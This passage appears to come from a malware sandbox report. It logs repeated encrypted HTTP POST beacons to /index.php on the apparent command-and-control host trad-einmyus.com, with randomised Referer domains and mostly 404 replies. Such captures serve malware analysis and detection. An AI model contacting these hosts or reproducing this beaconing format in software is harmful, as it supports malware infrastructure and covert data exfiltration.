                                                                                                                                                                                                                                      Accept: */*
                                                                                                                                                                                                                                      Referer: http://ygytcnantfux.net/
                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                                                                      Content-Length: 208
                                                                                                                                                                                                                                      Host: trad-einmyus.com
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:04.332379103 CET208OUTData Raw: 12 87 f7 99 6b f9 d2 ba c2 39 77 34 79 bd e2 8d 42 1f a9 44 d5 31 19 99 bd 9c ae f0 f3 a2 9b f6 1f c1 5e a8 68 1a bf e7 ea ac f3 dc db 94 13 05 7d f0 6b 92 b4 af aa 80 eb 5c bd d2 e4 d8 46 d4 75 24 f3 c4 84 de 96 66 5d 02 c9 a1 c1 64 5c 83 91 23
                                                                                                                                                                                                                                      Data Ascii: k9w4yBD1^h}k\Fu$f]d\#Thog)Zf&nOoMM~&u;4<T]JQ@&Rg)W%cL*Q|a*-N!yL-OhW9]-pLp
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:04.568094969 CET578INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                      server: nginx/1.20.2
                                                                                                                                                                                                                                      date: Thu, 28 Mar 2024 16:51:04 GMT
                                                                                                                                                                                                                                      content-type: text/html; charset=utf-8
                                                                                                                                                                                                                                      transfer-encoding: chunked
                                                                                                                                                                                                                                      Data Raw: 31 39 44 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 74 72 61 64 2d 65 69 6e 6d 79 75 73 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 19D<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at trad-einmyus.com Port 80</address></body></html>0
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:04.571507931 CET284OUTPOST /index.php HTTP/1.1
                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Accept: */*
                                                                                                                                                                                                                                      Referer: http://awayqydmiytmar.com/
                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                                                                      Content-Length: 162
                                                                                                                                                                                                                                      Host: trad-einmyus.com
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:04.571552992 CET162OUTData Raw: 12 87 f7 99 6b f9 d2 ba c2 39 77 34 79 bd e2 8d 42 1f a9 44 d5 31 19 99 bd 9c ae f0 f3 a2 9b f6 1f c1 5e a8 68 1a bf e7 ea ac f3 dc db 94 13 05 7d f0 6b 92 b4 af aa 80 eb 5c bd d2 e4 d8 46 d4 75 24 f3 c4 85 de 97 66 5d 02 c8 a1 c1 64 17 af c9 25
                                                                                                                                                                                                                                      Data Ascii: k9w4yBD1^h}k\Fu$f]d%AgZ5[UW2+KyYn0}l##P%c$'nf0I]=cK]tl>^[
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:04.807843924 CET578INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                      server: nginx/1.20.2
                                                                                                                                                                                                                                      date: Thu, 28 Mar 2024 16:51:04 GMT
                                                                                                                                                                                                                                      content-type: text/html; charset=utf-8
                                                                                                                                                                                                                                      transfer-encoding: chunked
                                                                                                                                                                                                                                      Data Raw: 31 39 44 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 74 72 61 64 2d 65 69 6e 6d 79 75 73 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 19D<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at trad-einmyus.com Port 80</address></body></html>0
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:04.811388016 CET286OUTPOST /index.php HTTP/1.1
                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Accept: */*
                                                                                                                                                                                                                                      Referer: http://nwhaihbnyhyxnnhu.net/
                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                                                                      Content-Length: 291
                                                                                                                                                                                                                                      Host: trad-einmyus.com
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:04.811415911 CET291OUTData Raw: 12 87 f7 99 6b f9 d2 ba c2 39 77 34 79 bd e2 8d 42 1f a9 44 d5 31 19 99 bd 9c ae f0 f3 a2 9b f6 1f c1 5e a8 68 1a bf e7 ea ac f3 dc db 94 13 05 7d f0 6b 92 b4 af aa 80 eb 5c bd d2 e4 d8 46 d4 75 24 f3 c4 85 de 94 66 5d 02 c8 a1 c1 64 17 c3 dc 28
                                                                                                                                                                                                                                      Data Ascii: k9w4yBD1^h}k\Fu$f]d(n"`R+.C1dk7}Yo L^L[Uqf;}<G/:W7E""g~&]\qS5w1.M6i\[c13hl7{g?)
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:05.045326948 CET137INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      server: nginx/1.20.2
                                                                                                                                                                                                                                      date: Thu, 28 Mar 2024 16:51:04 GMT
                                                                                                                                                                                                                                      content-type: text/html; charset=utf-8
                                                                                                                                                                                                                                      content-length: 0
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:05.047538996 CET283OUTPOST /index.php HTTP/1.1
                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Accept: */*
                                                                                                                                                                                                                                      Referer: http://qcuhrqgapjbmm.net/
                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                                                                      Content-Length: 308
                                                                                                                                                                                                                                      Host: trad-einmyus.com
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:05.047563076 CET308OUTData Raw: 12 87 f7 99 6b f9 d2 ba c2 39 77 34 79 bd e2 8d 42 1f a9 44 d5 31 19 99 bd 9c ae f0 f3 a2 9b f6 1f c1 5e a8 68 1a bf e7 ea ac f3 dc db 94 13 05 7d f0 6b 92 b4 af aa 80 eb 5c bd d2 e4 d8 46 d4 75 24 f3 c4 85 de 95 66 5d 02 c8 a1 c1 64 19 8a ac 67
                                                                                                                                                                                                                                      Data Ascii: k9w4yBD1^h}k\Fu$f]dg.D*&jNc^(+C%[x~>Ocq)}-m)#RouniYQIwfPO@PCdmF )6FWod0_XId2I_/cUO)E&RVO68
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:05.282638073 CET578INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                      server: nginx/1.20.2
                                                                                                                                                                                                                                      date: Thu, 28 Mar 2024 16:51:05 GMT
                                                                                                                                                                                                                                      content-type: text/html; charset=utf-8
                                                                                                                                                                                                                                      transfer-encoding: chunked
                                                                                                                                                                                                                                      Data Raw: 31 39 44 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 74 72 61 64 2d 65 69 6e 6d 79 75 73 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 19D<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at trad-einmyus.com Port 80</address></body></html>0
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:05.285090923 CET283OUTPOST /index.php HTTP/1.1
                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Accept: */*
                                                                                                                                                                                                                                      Referer: http://scsrfrjxtrigj.com/
                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                                                                      Content-Length: 291
                                                                                                                                                                                                                                      Host: trad-einmyus.com
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:05.285132885 CET291OUTData Raw: 12 87 f7 99 6b f9 d2 ba c2 39 77 34 79 bd e2 8d 42 1f a9 44 d5 31 19 99 bd 9c ae f0 f3 a2 9b f6 1f c1 5e a8 68 1a bf e7 ea ac f3 dc db 94 13 05 7d f0 6b 92 b4 af aa 80 eb 5c bd d2 e4 d8 46 d4 75 24 f3 c4 85 de 92 66 5d 02 c8 a1 c1 64 55 ac ca 2f
                                                                                                                                                                                                                                      Data Ascii: k9w4yBD1^h}k\Fu$f]dU/*b-fN>OsFDPM<A}fJzhaQM/tO'+1\kF"Ki83eq;Fu|\Vo>y?5`$RA\ylN~KzF'
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:05.520549059 CET578INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                      server: nginx/1.20.2
                                                                                                                                                                                                                                      date: Thu, 28 Mar 2024 16:51:05 GMT
                                                                                                                                                                                                                                      content-type: text/html; charset=utf-8
                                                                                                                                                                                                                                      transfer-encoding: chunked
                                                                                                                                                                                                                                      Data Raw: 31 39 44 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 74 72 61 64 2d 65 69 6e 6d 79 75 73 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 19D<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at trad-einmyus.com Port 80</address></body></html>0
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:05.523073912 CET281OUTPOST /index.php HTTP/1.1
                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Accept: */*
                                                                                                                                                                                                                                      Referer: http://xplinqkvhni.net/
                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                                                                      Content-Length: 238
                                                                                                                                                                                                                                      Host: trad-einmyus.com
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:05.523102045 CET238OUTData Raw: 12 87 f7 99 6b f9 d2 ba c2 39 77 34 79 bd e2 8d 42 1f a9 44 d5 31 19 99 bd 9c ae f0 f3 a2 9b f6 1f c1 5e a8 68 1a bf e7 ea ac f3 dc db 94 13 05 7d f0 6b 92 b4 af aa 80 eb 5c bd d2 e4 d8 46 d4 75 24 f3 c4 85 de 93 66 5d 02 c8 a1 c1 64 33 a6 df 30
                                                                                                                                                                                                                                      Data Ascii: k9w4yBD1^h}k\Fu$f]d309utnbdU~f^zqA\BeYg"Xjzk,6FBUF(M]6P9R_YIdYiTz^X'xy@"<.~kS
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:05.755563974 CET578INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                      server: nginx/1.20.2
                                                                                                                                                                                                                                      date: Thu, 28 Mar 2024 16:51:05 GMT
                                                                                                                                                                                                                                      content-type: text/html; charset=utf-8
                                                                                                                                                                                                                                      transfer-encoding: chunked
                                                                                                                                                                                                                                      Data Raw: 31 39 44 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 74 72 61 64 2d 65 69 6e 6d 79 75 73 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 19D<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at trad-einmyus.com Port 80</address></body></html>0
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:05.813472033 CET285OUTPOST /index.php HTTP/1.1
                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Accept: */*
                                                                                                                                                                                                                                      Referer: http://xdgpndakpxadhnb.com/
                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                                                                      Content-Length: 179
                                                                                                                                                                                                                                      Host: trad-einmyus.com
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:05.813493013 CET179OUTData Raw: 12 87 f7 99 6b f9 d2 ba c2 39 77 34 79 bd e2 8d 42 1f a9 44 d5 31 19 99 bd 9c ae f0 f3 a2 9b f6 1f c1 5e a8 68 1a bf e7 ea ac f3 dc db 94 13 05 7d f0 6b 92 b4 af aa 80 eb 5c bd d2 e4 d8 46 d4 75 24 f3 c4 85 de 90 66 5d 02 c8 a1 c1 64 35 99 a0 6f
                                                                                                                                                                                                                                      Data Ascii: k9w4yBD1^h}k\Fu$f]d5o.37x3BqcXO!\Vn8o&Q#5%=PWqF`[/rV:;d4^$:}%qw
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:06.050782919 CET578INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                      server: nginx/1.20.2
                                                                                                                                                                                                                                      date: Thu, 28 Mar 2024 16:51:05 GMT
                                                                                                                                                                                                                                      content-type: text/html; charset=utf-8
                                                                                                                                                                                                                                      transfer-encoding: chunked
                                                                                                                                                                                                                                      Data Raw: 31 39 44 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 74 72 61 64 2d 65 69 6e 6d 79 75 73 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 19D<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at trad-einmyus.com Port 80</address></body></html>0
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:06.054095030 CET282OUTPOST /index.php HTTP/1.1
                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Accept: */*
                                                                                                                                                                                                                                      Referer: http://bpudkoaipgmn.org/
                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                                                                      Content-Length: 357
                                                                                                                                                                                                                                      Host: trad-einmyus.com
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:06.054142952 CET357OUTData Raw: 12 87 f7 99 6b f9 d2 ba c2 39 77 34 79 bd e2 8d 42 1f a9 44 d5 31 19 99 bd 9c ae f0 f3 a2 9b f6 1f c1 5e a8 68 1a bf e7 ea ac f3 dc db 94 13 05 7d f0 6b 92 b4 af aa 80 eb 5c bd d2 e4 d8 46 d4 75 24 f3 c4 85 de 91 66 5d 02 c8 a1 c1 64 05 b5 d8 31
                                                                                                                                                                                                                                      Data Ascii: k9w4yBD1^h}k\Fu$f]d1<]hgKX<n\#(_3)A@"Sf~bHxYHL|bI*&9WLHA+o#b:w/:yZ3uAd;N}?ZI45C=On@6K
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:06.289833069 CET578INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                      server: nginx/1.20.2
                                                                                                                                                                                                                                      date: Thu, 28 Mar 2024 16:51:06 GMT
                                                                                                                                                                                                                                      content-type: text/html; charset=utf-8
                                                                                                                                                                                                                                      transfer-encoding: chunked
                                                                                                                                                                                                                                      Data Raw: 31 39 44 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 74 72 61 64 2d 65 69 6e 6d 79 75 73 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a
